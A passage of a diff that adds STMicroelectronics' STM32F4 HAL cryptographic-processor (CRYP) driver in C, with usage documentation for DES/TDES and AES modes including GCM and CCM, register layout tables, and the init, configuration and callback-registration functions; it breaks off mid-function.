HAL_NVIC_EnableIRQ() + + (#)Initialize the CRYP according to the specified parameters : + (##) The data type: 1-bit, 8-bit, 16-bit or 32-bit. + (##) The key size: 128, 192 or 256. + (##) The AlgoMode DES/ TDES Algorithm ECB/CBC or AES Algorithm ECB/CBC/CTR/GCM or CCM. + (##) The initialization vector (counter). It is not used in ECB mode. + (##) The key buffer used for encryption/decryption. + (##) The Header used only in AES GCM and CCM Algorithm for authentication. + (##) The HeaderSize The size of header buffer in word. + (##) The B0 block is the first authentication block used only in AES CCM mode. + + (#)Three processing (encryption/decryption) functions are available: + (##) Polling mode: encryption and decryption APIs are blocking functions + i.e. they process the data and wait till the processing is finished, + e.g. HAL_CRYP_Encrypt & HAL_CRYP_Decrypt + (##) Interrupt mode: encryption and decryption APIs are not blocking functions + i.e. they process the data under interrupt, + e.g. HAL_CRYP_Encrypt_IT & HAL_CRYP_Decrypt_IT + (##) DMA mode: encryption and decryption APIs are not blocking functions + i.e. the data transfer is ensured by DMA, + e.g. HAL_CRYP_Encrypt_DMA & HAL_CRYP_Decrypt_DMA + + (#)When the processing function is called at first time after HAL_CRYP_Init() + the CRYP peripheral is configured and processes the buffer in input. + At second call, no need to Initialize the CRYP, user have to get current configuration via + HAL_CRYP_GetConfig() API, then only HAL_CRYP_SetConfig() is requested to set + new parametres, finally user can start encryption/decryption. + + (#)Call HAL_CRYP_DeInit() to deinitialize the CRYP peripheral. + + (#)To process a single message with consecutive calls to HAL_CRYP_Encrypt() or HAL_CRYP_Decrypt() + without having to configure again the Key or the Initialization Vector between each API call, + the field KeyIVConfigSkip of the initialization structure must be set to CRYP_KEYIVCONFIG_ONCE. + Same is true for consecutive calls of HAL_CRYP_Encrypt_IT(), HAL_CRYP_Decrypt_IT(), HAL_CRYP_Encrypt_DMA() + or HAL_CRYP_Decrypt_DMA(). + + [..] + The cryptographic processor supports following standards: + (#) The data encryption standard (DES) and Triple-DES (TDES) supported only by CRYP1 IP: + (##)64-bit data block processing + (##) chaining modes supported : + (+++) Electronic Code Book(ECB) + (+++) Cipher Block Chaining (CBC) + (##) keys length supported :64-bit, 128-bit and 192-bit. + (#) The advanced encryption standard (AES) supported by CRYP1 & TinyAES IP: + (##)128-bit data block processing + (##) chaining modes supported : + (+++) Electronic Code Book(ECB) + (+++) Cipher Block Chaining (CBC) + (+++) Counter mode (CTR) + (+++) Galois/counter mode (GCM/GMAC) + (+++) Counter with Cipher Block Chaining-Message(CCM) + (##) keys length Supported : + (+++) for CRYP1 IP: 128-bit, 192-bit and 256-bit. + (+++) for TinyAES IP: 128-bit and 256-bit + + [..] This section describes the AES Galois/counter mode (GCM) supported by both CRYP1 IP: + (#) Algorithm supported : + (##) Galois/counter mode (GCM) + (##) Galois message authentication code (GMAC) :is exactly the same as + GCM algorithm composed only by an header. + (#) Four phases are performed in GCM : + (##) Init phase: IP prepares the GCM hash subkey (H) and do the IV processing + (##) Header phase: IP processes the Additional Authenticated Data (AAD), with hash + computation only. + (##) Payload phase: IP processes the plaintext (P) with hash computation + keystream + encryption + data XORing. It works in a similar way for ciphertext (C). + (##) Final phase: IP generates the authenticated tag (T) using the last block of data. + (#) structure of message construction in GCM is defined as below : + (##) 16 bytes Initial Counter Block (ICB)composed of IV and counter + (##) The authenticated header A (also knows as Additional Authentication Data AAD) + this part of the message is only authenticated, not encrypted. + (##) The plaintext message P is both authenticated and encrypted as ciphertext. + GCM standard specifies that ciphertext has same bit length as the plaintext. + (##) The last block is composed of the length of A (on 64 bits) and the length of ciphertext + (on 64 bits) + + [..] This section describe The AES Counter with Cipher Block Chaining-Message + Authentication Code (CCM) supported by both CRYP1 IP: + (#) Specific parameters for CCM : + + (##) B0 block : According to NIST Special Publication 800-38C, + The first block B0 is formatted as follows, where l(m) is encoded in + most-significant-byte first order(see below table 3) + + (+++) Q: a bit string representation of the octet length of P (plaintext) + (+++) q The octet length of the binary representation of the octet length of the payload + (+++) A nonce (N), n The octet length of the where n+q=15. + (+++) Flags: most significant octet containing four flags for control information, + (+++) t The octet length of the MAC. + (##) B1 block (header) : associated data length(a) concatenated with Associated Data (A) + the associated data length expressed in bytes (a) defined as below: + (+++) If 0 < a < 216-28, then it is encoded as [a]16, i.e. two octets + (+++) If 216-28 < a < 232, then it is encoded as 0xff || 0xfe || [a]32, i.e. six octets + (+++) If 232 < a < 264, then it is encoded as 0xff || 0xff || [a]64, i.e. ten octets + (##) CTRx block : control blocks + (+++) Generation of CTR1 from first block B0 information : + equal to B0 with first 5 bits zeroed and most significant bits storing octet + length of P also zeroed, then incremented by one ( see below Table 4) + (+++) Generation of CTR0: same as CTR1 with bit[0] set to zero. + + (#) Four phases are performed in CCM for CRYP1 IP: + (##) Init phase: IP prepares the GCM hash subkey (H) and do the IV processing + (##) Header phase: IP processes the Additional Authenticated Data (AAD), with hash + computation only. + (##) Payload phase: IP processes the plaintext (P) with hash computation + keystream + encryption + data XORing. It works in a similar way for ciphertext (C). + (##) Final phase: IP generates the authenticated tag (T) using the last block of data. + + *** Callback registration *** + ============================================= + + The compilation define USE_HAL_CRYP_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use Functions @ref HAL_CRYP_RegisterCallback() or HAL_CRYP_RegisterXXXCallback() + to register an interrupt callback. + + Function @ref HAL_CRYP_RegisterCallback() allows to register following callbacks: + (+) InCpltCallback : Input FIFO transfer completed callback. + (+) OutCpltCallback : Output FIFO transfer completed callback. + (+) ErrorCallback : callback for error detection. + (+) MspInitCallback : CRYP MspInit. + (+) MspDeInitCallback : CRYP MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + Use function @ref HAL_CRYP_UnRegisterCallback() to reset a callback to the default + weak function. + @ref HAL_CRYP_UnRegisterCallback() takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) InCpltCallback : Input FIFO transfer completed callback. + (+) OutCpltCallback : Output FIFO transfer completed callback. + (+) ErrorCallback : callback for error detection. + (+) MspInitCallback : CRYP MspInit. + (+) MspDeInitCallback : CRYP MspDeInit. + + By default, after the @ref HAL_CRYP_Init() and when the state is HAL_CRYP_STATE_RESET + all callbacks are set to the corresponding weak functions : + examples @ref HAL_CRYP_InCpltCallback() , @ref HAL_CRYP_OutCpltCallback(). + Exception done for MspInit and MspDeInit functions that are + reset to the legacy weak function in the @ref HAL_CRYP_Init()/ @ref HAL_CRYP_DeInit() only when + these callbacks are null (not registered beforehand). + if not, MspInit or MspDeInit are not null, the @ref HAL_CRYP_Init() / @ref HAL_CRYP_DeInit() + keep and use the user MspInit/MspDeInit functions (registered beforehand) + + Callbacks can be registered/unregistered in HAL_CRYP_STATE_READY state only. + Exception done MspInit/MspDeInit callbacks that can be registered/unregistered + in HAL_CRYP_STATE_READY or HAL_CRYP_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using @ref HAL_CRYP_RegisterCallback() before calling @ref HAL_CRYP_DeInit() + or @ref HAL_CRYP_Init() function. + + When The compilation define USE_HAL_CRYP_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available and all callbacks + are set to the corresponding weak functions. + + Table 1. Initial Counter Block (ICB) + +-------------------------------------------------------+ + | Initialization vector (IV) | Counter | + |----------------|----------------|-----------|---------| + 127 95 63 31 0 + + + Bit Number Register Contents + ---------- --------------- ----------- + 127 ...96 CRYP_IV1R[31:0] ICB[127:96] + 95 ...64 CRYP_IV1L[31:0] B0[95:64] + 63 ... 32 CRYP_IV0R[31:0] ICB[63:32] + 31 ... 0 CRYP_IV0L[31:0] ICB[31:0], where 32-bit counter= 0x2 + + Table 2. GCM last block definition + + +-------------------------------------------------------------------+ + | Bit[0] | Bit[32] | Bit[64] | Bit[96] | + |-----------|--------------------|-----------|----------------------| + | 0x0 | Header length[31:0]| 0x0 | Payload length[31:0] | + |-----------|--------------------|-----------|----------------------| + + Table 3. B0 block + Octet Number Contents + ------------ --------- + 0 Flags + 1 ... 15-q Nonce N + 16-q ... 15 Q + + the Flags field is formatted as follows: + + Bit Number Contents + ---------- ---------------------- + 7 Reserved (always zero) + 6 Adata + 5 ... 3 (t-2)/2 + 2 ... 0 [q-1]3 + + Table 4. CTRx block + Bit Number Register Contents + ---------- --------------- ----------- + 127 ...96 CRYP_IV1R[31:0] B0[127:96], where Q length bits are set to 0, except for + bit 0 that is set to 1 + 95 ...64 CRYP_IV1L[31:0] B0[95:64] + 63 ... 32 CRYP_IV0R[31:0] B0[63:32] + 31 ... 0 CRYP_IV0L[31:0] B0[31:0], where flag bits set to 0 + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +#if defined (AES) || defined (CRYP) + +/** @defgroup CRYP CRYP + * @brief CRYP HAL module driver. + * @{ + */ + + +#ifdef HAL_CRYP_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup CRYP_Private_Defines + * @{ + */ +#define CRYP_TIMEOUT_KEYPREPARATION 82U /*The latency of key preparation operation is 82 clock cycles.*/ +#define CRYP_TIMEOUT_GCMCCMINITPHASE 299U /* The latency of GCM/CCM init phase to prepare hash subkey is 299 clock cycles.*/ +#define CRYP_TIMEOUT_GCMCCMHEADERPHASE 290U /* The latency of GCM/CCM header phase is 290 clock cycles.*/ + +#define CRYP_PHASE_READY 0x00000001U /*!< CRYP peripheral is ready for initialization. */ +#define CRYP_PHASE_PROCESS 0x00000002U /*!< CRYP peripheral is in processing phase */ + +#if defined(AES) +#define CRYP_OPERATINGMODE_ENCRYPT 0x00000000U /*!< Encryption mode(Mode 1) */ +#define CRYP_OPERATINGMODE_KEYDERIVATION AES_CR_MODE_0 /*!< Key derivation mode only used when performing ECB and CBC decryptions (Mode 2) */ +#define CRYP_OPERATINGMODE_DECRYPT AES_CR_MODE_1 /*!< Decryption (Mode 3) */ +#define CRYP_OPERATINGMODE_KEYDERIVATION_DECRYPT AES_CR_MODE /*!< Key derivation and decryption only used when performing ECB and CBC decryptions (Mode 4) */ +#define CRYP_PHASE_INIT 0x00000000U /*!< GCM/GMAC (or CCM) init phase */ +#define CRYP_PHASE_HEADER AES_CR_GCMPH_0 /*!< GCM/GMAC or CCM header phase */ +#define CRYP_PHASE_PAYLOAD AES_CR_GCMPH_1 /*!< GCM(/CCM) payload phase */ +#define CRYP_PHASE_FINAL AES_CR_GCMPH /*!< GCM/GMAC or CCM final phase */ +#else /* CRYP */ +#define CRYP_PHASE_INIT 0x00000000U /*!< GCM/GMAC (or CCM) init phase */ +#define CRYP_PHASE_HEADER CRYP_CR_GCM_CCMPH_0 /*!< GCM/GMAC or CCM header phase */ +#define CRYP_PHASE_PAYLOAD CRYP_CR_GCM_CCMPH_1 /*!< GCM(/CCM) payload phase */ +#define CRYP_PHASE_FINAL CRYP_CR_GCM_CCMPH /*!< GCM/GMAC or CCM final phase */ +#define CRYP_OPERATINGMODE_ENCRYPT 0x00000000U /*!< Encryption mode */ +#define CRYP_OPERATINGMODE_DECRYPT CRYP_CR_ALGODIR /*!< Decryption */ +#endif /* End CRYP or AES */ + +/* CTR1 information to use in CCM algorithm */ +#define CRYP_CCM_CTR1_0 0x07FFFFFFU +#define CRYP_CCM_CTR1_1 0xFFFFFF00U +#define CRYP_CCM_CTR1_2 0x00000001U + + +/** + * @} + */ + + +/* Private macro -------------------------------------------------------------*/ +/** @addtogroup CRYP_Private_Macros + * @{ + */ + +#if defined(CRYP) + +#define CRYP_SET_PHASE(__HANDLE__, __PHASE__) do{(__HANDLE__)->Instance->CR &= (uint32_t)(~CRYP_CR_GCM_CCMPH);\ + (__HANDLE__)->Instance->CR |= (uint32_t)(__PHASE__);\ + }while(0) + +#define HAL_CRYP_FIFO_FLUSH(__HANDLE__) ((__HANDLE__)->Instance->CR |= CRYP_CR_FFLUSH) + +#else /*AES*/ +#define CRYP_SET_PHASE(__HANDLE__, __PHASE__) do{(__HANDLE__)->Instance->CR &= (uint32_t)(~AES_CR_GCMPH);\ + (__HANDLE__)->Instance->CR |= (uint32_t)(__PHASE__);\ + }while(0) +#endif /* End AES or CRYP*/ + + +/** + * @} + */ + +/* Private struct -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @addtogroup CRYP_Private_Functions_prototypes + * @{ + */ + +static void CRYP_SetDMAConfig(CRYP_HandleTypeDef *hcryp, uint32_t inputaddr, uint16_t Size, uint32_t outputaddr); +static void CRYP_DMAInCplt(DMA_HandleTypeDef *hdma); +static void CRYP_DMAOutCplt(DMA_HandleTypeDef *hdma); +static void CRYP_DMAError(DMA_HandleTypeDef *hdma); +static void CRYP_SetKey(CRYP_HandleTypeDef *hcryp, uint32_t KeySize); +static void CRYP_AES_IT(CRYP_HandleTypeDef *hcryp); +#if defined (CRYP_CR_ALGOMODE_AES_GCM)|| defined (AES) +static HAL_StatusTypeDef CRYP_GCMCCM_SetHeaderPhase(CRYP_HandleTypeDef *hcryp, uint32_t Timeout); +static void CRYP_GCMCCM_SetPayloadPhase_IT(CRYP_HandleTypeDef *hcryp); +static void CRYP_GCMCCM_SetHeaderPhase_IT(CRYP_HandleTypeDef *hcryp); +static HAL_StatusTypeDef CRYP_GCMCCM_SetHeaderPhase_DMA(CRYP_HandleTypeDef *hcryp); +static void CRYP_Workaround(CRYP_HandleTypeDef *hcryp, uint32_t Timeout); +static HAL_StatusTypeDef CRYP_AESGCM_Process_DMA(CRYP_HandleTypeDef *hcryp); +static HAL_StatusTypeDef CRYP_AESGCM_Process_IT(CRYP_HandleTypeDef *hcryp); +static HAL_StatusTypeDef CRYP_AESGCM_Process(CRYP_HandleTypeDef *hcryp, uint32_t Timeout); +static HAL_StatusTypeDef CRYP_AESCCM_Process(CRYP_HandleTypeDef *hcryp, uint32_t Timeout); +static HAL_StatusTypeDef CRYP_AESCCM_Process_IT(CRYP_HandleTypeDef *hcryp); +static HAL_StatusTypeDef CRYP_AESCCM_Process_DMA(CRYP_HandleTypeDef *hcryp); +#endif /* AES or GCM CCM defined*/ +static void CRYP_AES_ProcessData(CRYP_HandleTypeDef *hcrypt, uint32_t Timeout); +static HAL_StatusTypeDef CRYP_AES_Encrypt(CRYP_HandleTypeDef *hcryp, uint32_t Timeout); +static HAL_StatusTypeDef CRYP_AES_Decrypt(CRYP_HandleTypeDef *hcryp, uint32_t Timeout); +static HAL_StatusTypeDef CRYP_AES_Decrypt_IT(CRYP_HandleTypeDef *hcryp); +static HAL_StatusTypeDef CRYP_AES_Encrypt_IT(CRYP_HandleTypeDef *hcryp); +static HAL_StatusTypeDef CRYP_AES_Decrypt_DMA(CRYP_HandleTypeDef *hcryp); +#if defined (CRYP) +static void CRYP_TDES_IT(CRYP_HandleTypeDef *hcryp); +#if defined (CRYP_CR_ALGOMODE_AES_GCM) +static HAL_StatusTypeDef CRYP_WaitOnIFEMFlag(CRYP_HandleTypeDef *hcryp, uint32_t Timeout); +#endif /* GCM CCM defined*/ +static HAL_StatusTypeDef CRYP_WaitOnBUSYFlag(CRYP_HandleTypeDef *hcryp, uint32_t Timeout); +static HAL_StatusTypeDef CRYP_WaitOnOFNEFlag(CRYP_HandleTypeDef *hcryp, uint32_t Timeout); +static HAL_StatusTypeDef CRYP_TDES_Process(CRYP_HandleTypeDef *hcryp, uint32_t Timeout); +#else /*AES*/ +static HAL_StatusTypeDef CRYP_WaitOnCCFlag(CRYP_HandleTypeDef *hcryp, uint32_t Timeout); +#endif /* End CRYP or AES */ + +/** + * @} + */ + +/* Exported functions ---------------------------------------------------------*/ + +/** @defgroup CRYP_Exported_Functions CRYP Exported Functions + * @{ + */ + + +/** @defgroup CRYP_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions. + * +@verbatim + ======================================================================================== + ##### Initialization, de-initialization and Set and Get configuration functions ##### + ======================================================================================== + [..] This section provides functions allowing to: + (+) Initialize the CRYP + (+) DeInitialize the CRYP + (+) Initialize the CRYP MSP + (+) DeInitialize the CRYP MSP + (+) configure CRYP (HAL_CRYP_SetConfig) with the specified parameters in the CRYP_ConfigTypeDef + Parameters which are configured in This section are : + (+) Key size + (+) Data Type : 32,16, 8 or 1bit + (+) AlgoMode : + - for CRYP1 IP : + ECB and CBC in DES/TDES Standard + ECB,CBC,CTR,GCM/GMAC and CCM in AES Standard. + - for TinyAES2 IP, only ECB,CBC,CTR,GCM/GMAC and CCM in AES Standard are supported. + (+) Get CRYP configuration (HAL_CRYP_GetConfig) from the specified parameters in the CRYP_HandleTypeDef + + +@endverbatim + * @{ + */ + + +/** + * @brief Initializes the CRYP according to the specified + * parameters in the CRYP_ConfigTypeDef and creates the associated handle. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CRYP_Init(CRYP_HandleTypeDef *hcryp) +{ + /* Check the CRYP handle allocation */ + if (hcryp == NULL) + { + return HAL_ERROR; + } + + /* Check parameters */ + assert_param(IS_CRYP_KEYSIZE(hcryp->Init.KeySize)); + assert_param(IS_CRYP_DATATYPE(hcryp->Init.DataType)); + assert_param(IS_CRYP_ALGORITHM(hcryp->Init.Algorithm)); + assert_param(IS_CRYP_INIT(hcryp->Init.KeyIVConfigSkip)); + +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + if (hcryp->State == HAL_CRYP_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hcryp->Lock = HAL_UNLOCKED; + + hcryp->InCpltCallback = HAL_CRYP_InCpltCallback; /* Legacy weak InCpltCallback */ + hcryp->OutCpltCallback = HAL_CRYP_OutCpltCallback; /* Legacy weak OutCpltCallback */ + hcryp->ErrorCallback = HAL_CRYP_ErrorCallback; /* Legacy weak ErrorCallback */ + + if (hcryp->MspInitCallback == NULL) + { + hcryp->MspInitCallback = HAL_CRYP_MspInit; /* Legacy weak MspInit */ + } + + /* Init the low level hardware */ + hcryp->MspInitCallback(hcryp); + } +#else + if (hcryp->State == HAL_CRYP_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hcryp->Lock = HAL_UNLOCKED; + + /* Init the low level hardware */ + HAL_CRYP_MspInit(hcryp); + } +#endif /* (USE_HAL_CRYP_REGISTER_CALLBACKS) */ + + /* Set the key size(This bit field is dont care in the DES or TDES modes) data type and Algorithm */ +#if defined (CRYP) + + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_DATATYPE | CRYP_CR_KEYSIZE | CRYP_CR_ALGOMODE, + hcryp->Init.DataType | hcryp->Init.KeySize | hcryp->Init.Algorithm); + +#else /*AES*/ + + MODIFY_REG(hcryp->Instance->CR, AES_CR_DATATYPE | AES_CR_KEYSIZE | AES_CR_CHMOD, + hcryp->Init.DataType | hcryp->Init.KeySize | hcryp->Init.Algorithm); + +#endif /* End AES or CRYP*/ + + /* Reset Error Code field */ + hcryp->ErrorCode = HAL_CRYP_ERROR_NONE; + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Set the default CRYP phase */ + hcryp->Phase = CRYP_PHASE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief De-Initializes the CRYP peripheral. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CRYP_DeInit(CRYP_HandleTypeDef *hcryp) +{ + /* Check the CRYP handle allocation */ + if (hcryp == NULL) + { + return HAL_ERROR; + } + + /* Set the default CRYP phase */ + hcryp->Phase = CRYP_PHASE_READY; + + /* Reset CrypInCount and CrypOutCount */ + hcryp->CrypInCount = 0; + hcryp->CrypOutCount = 0; + hcryp->CrypHeaderCount = 0; + + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + + if (hcryp->MspDeInitCallback == NULL) + { + hcryp->MspDeInitCallback = HAL_CRYP_MspDeInit; /* Legacy weak MspDeInit */ + } + /* DeInit the low level hardware */ + hcryp->MspDeInitCallback(hcryp); + +#else + + /* DeInit the low level hardware: CLOCK, NVIC.*/ + HAL_CRYP_MspDeInit(hcryp); + +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hcryp); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Configure the CRYP according to the specified + * parameters in the CRYP_ConfigTypeDef + * @param hcryp: pointer to a CRYP_HandleTypeDef structure + * @param pConf: pointer to a CRYP_ConfigTypeDef structure that contains + * the configuration information for CRYP module + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CRYP_SetConfig(CRYP_HandleTypeDef *hcryp, CRYP_ConfigTypeDef *pConf) +{ + /* Check the CRYP handle allocation */ + if ((hcryp == NULL) || (pConf == NULL)) + { + return HAL_ERROR; + } + + /* Check parameters */ + assert_param(IS_CRYP_KEYSIZE(pConf->KeySize)); + assert_param(IS_CRYP_DATATYPE(pConf->DataType)); + assert_param(IS_CRYP_ALGORITHM(pConf->Algorithm)); + + if (hcryp->State == HAL_CRYP_STATE_READY) + { + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_BUSY; + + /* Process locked */ + __HAL_LOCK(hcryp); + + /* Set CRYP parameters */ + hcryp->Init.DataType = pConf->DataType; + hcryp->Init.pKey = pConf->pKey; + hcryp->Init.Algorithm = pConf->Algorithm; + hcryp->Init.KeySize = pConf->KeySize; + hcryp->Init.pInitVect = pConf->pInitVect; + hcryp->Init.Header = pConf->Header; + hcryp->Init.HeaderSize = pConf->HeaderSize; + hcryp->Init.B0 = pConf->B0; + hcryp->Init.DataWidthUnit = pConf->DataWidthUnit; + hcryp->Init.KeyIVConfigSkip = pConf->KeyIVConfigSkip; + hcryp->Init.HeaderWidthUnit = pConf->HeaderWidthUnit; + + /* Set the key size(This bit field is dont care in the DES or TDES modes) data type, AlgoMode and operating mode*/ +#if defined (CRYP) + + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_DATATYPE | CRYP_CR_KEYSIZE | CRYP_CR_ALGOMODE, + hcryp->Init.DataType | hcryp->Init.KeySize | hcryp->Init.Algorithm); + +#else /*AES*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_DATATYPE | AES_CR_KEYSIZE | AES_CR_CHMOD, + hcryp->Init.DataType | hcryp->Init.KeySize | hcryp->Init.Algorithm); + + /*clear error flags*/ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_ERR_CLEAR); + +#endif /* End AES or CRYP */ + + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); + + /* Reset Error Code field */ + hcryp->ErrorCode = HAL_CRYP_ERROR_NONE; + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Set the default CRYP phase */ + hcryp->Phase = CRYP_PHASE_READY; + + /* Return function status */ + return HAL_OK; + } + else + { + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); + + /* Busy error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_BUSY; + return HAL_ERROR; + } +} + +/** + * @brief Get CRYP Configuration parameters in associated handle. + * @param pConf: pointer to a CRYP_ConfigTypeDef structure + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CRYP_GetConfig(CRYP_HandleTypeDef *hcryp, CRYP_ConfigTypeDef *pConf) +{ + /* Check the CRYP handle allocation */ + if ((hcryp == NULL) || (pConf == NULL)) + { + return HAL_ERROR; + } + + if (hcryp->State == HAL_CRYP_STATE_READY) + { + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_BUSY; + + /* Process locked */ + __HAL_LOCK(hcryp); + + /* Get CRYP parameters */ + pConf->DataType = hcryp->Init.DataType; + pConf->pKey = hcryp->Init.pKey; + pConf->Algorithm = hcryp->Init.Algorithm; + pConf->KeySize = hcryp->Init.KeySize ; + pConf->pInitVect = hcryp->Init.pInitVect; + pConf->Header = hcryp->Init.Header ; + pConf->HeaderSize = hcryp->Init.HeaderSize; + pConf->B0 = hcryp->Init.B0; + pConf->DataWidthUnit = hcryp->Init.DataWidthUnit; + pConf->KeyIVConfigSkip = hcryp->Init.KeyIVConfigSkip; + pConf->HeaderWidthUnit = hcryp->Init.HeaderWidthUnit; + + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Return function status */ + return HAL_OK; + } + else + { + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); + + /* Busy error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_BUSY; + return HAL_ERROR; + } +} +/** + * @brief Initializes the CRYP MSP. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @retval None + */ +__weak void HAL_CRYP_MspInit(CRYP_HandleTypeDef *hcryp) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcryp); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_CRYP_MspInit can be implemented in the user file + */ +} + +/** + * @brief DeInitializes CRYP MSP. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @retval None + */ +__weak void HAL_CRYP_MspDeInit(CRYP_HandleTypeDef *hcryp) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcryp); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_CRYP_MspDeInit can be implemented in the user file + */ +} + +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User CRYP Callback + * To be used instead of the weak predefined callback + * @param hcryp cryp handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_CRYP_INPUT_COMPLETE_CB_ID Input FIFO transfer completed callback ID + * @arg @ref HAL_CRYP_OUTPUT_COMPLETE_CB_ID Output FIFO transfer completed callback ID + * @arg @ref HAL_CRYP_ERROR_CB_ID Error callback ID + * @arg @ref HAL_CRYP_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_CRYP_MSPDEINIT_CB_ID MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_CRYP_RegisterCallback(CRYP_HandleTypeDef *hcryp, HAL_CRYP_CallbackIDTypeDef CallbackID, + pCRYP_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hcryp); + + if (hcryp->State == HAL_CRYP_STATE_READY) + { + switch (CallbackID) + { + case HAL_CRYP_INPUT_COMPLETE_CB_ID : + hcryp->InCpltCallback = pCallback; + break; + + case HAL_CRYP_OUTPUT_COMPLETE_CB_ID : + hcryp->OutCpltCallback = pCallback; + break; + + case HAL_CRYP_ERROR_CB_ID : + hcryp->ErrorCallback = pCallback; + break; + + case HAL_CRYP_MSPINIT_CB_ID : + hcryp->MspInitCallback = pCallback; + break; + + case HAL_CRYP_MSPDEINIT_CB_ID : + hcryp->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hcryp->State == HAL_CRYP_STATE_RESET) + { + switch (CallbackID) + { + case HAL_CRYP_MSPINIT_CB_ID : + hcryp->MspInitCallback = pCallback; + break; + + case HAL_CRYP_MSPDEINIT_CB_ID : + hcryp->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hcryp); + + return status; +} + +/** + * @brief Unregister an CRYP Callback + * CRYP callback is redirected to the weak predefined callback + * @param hcryp cryp handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_CRYP_INPUT_COMPLETE_CB_ID Input FIFO transfer completed callback ID + * @arg @ref HAL_CRYP_OUTPUT_COMPLETE_CB_ID Output FIFO transfer completed callback ID + * @arg @ref HAL_CRYP_ERROR_CB_ID Error callback ID + * @arg @ref HAL_CRYP_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_CRYP_MSPDEINIT_CB_ID MspDeInit callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_CRYP_UnRegisterCallback(CRYP_HandleTypeDef *hcryp, HAL_CRYP_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hcryp); + + if (hcryp->State == HAL_CRYP_STATE_READY) + { + switch (CallbackID) + { + case HAL_CRYP_INPUT_COMPLETE_CB_ID : + hcryp->InCpltCallback = HAL_CRYP_InCpltCallback; /* Legacy weak InCpltCallback */ + break; + + case 